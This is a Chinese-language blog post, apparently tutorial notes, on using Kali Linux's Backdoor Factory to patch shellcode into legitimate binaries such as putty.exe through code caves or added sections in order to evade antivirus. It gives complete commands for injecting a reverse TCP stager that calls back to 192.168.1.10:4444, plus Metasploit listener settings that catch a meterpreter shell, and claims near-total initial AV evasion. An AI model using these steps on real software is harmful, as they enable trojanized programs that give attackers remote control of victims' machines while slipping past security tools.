kali linux之Backdoor-factory

Backdoor-------python编写

适用于windows PE x32/x64 和Linux ELF x32/x64(OSX),支持msf payload 自定义payload

将shellcode代码patch进行模板文件,躲避AV检查

 

Patch:

通过替换exe,dll,注册表等方法修复系统漏洞或问题的方法

BDF:向二进制文件中增加或删除代码内容,某些受保护的二进制程序无法patch,存在一定概率文件会被patch坏掉

 

CTP方法--------增加新的代码段section,与msf的-k方法类似,使用现有的代码裂缝(code cave)存放shellcode

代码裂缝-------二进制文件中超过两个字节的连续x00区域(代码片段间区域),根据统计判断代码缝隙是编译器在进行编译时造成的,不同的编译器造成的代码缝隙大小不同

 

hexeditor查看某程序的代码裂缝

 

 

单个代码洞大小不足以存放完整的shellcode,多个代码洞跳转--非顺序执行(初期免杀率可达100%),结合msf的stager方法

 

patch选项----附加代码段,单代码注入,多代码注入

 

常用参数:

-f  指定某程序注入payload

-S 检查当前文件是否支持注入后门

-s  可以使用的有效负载,使用“show”来查看有效载荷

-H 接受反弹会话的ip主机

 

-c  代码裂缝,确定支持patch 后,查看其是否支持指定的 shellcode patch

-l   代码裂缝大小

-J  使用多代码缝隙跳转的方式

-a  使用add-new-section添加代码段

 

 

backdoor-factory -f putty.exe -S(查看是否支持注入后门)

backdoor-factory -f putty.exe -s show(查看支持的有效负载有哪些)

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444(使用iat_reverse_tcp_stager_threaded负载)

 

使用 msf 侦听

set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit

 

 

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -J(使用多代码缝隙跳转的方式)

 

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -a(使用add-new-section添加代码段)

 

 

 

使用 msf 侦听

set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit

 

 

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

posted @ 2019-03-05 16:06  Hydraxx  阅读(1431)  评论(0编辑  收藏  举报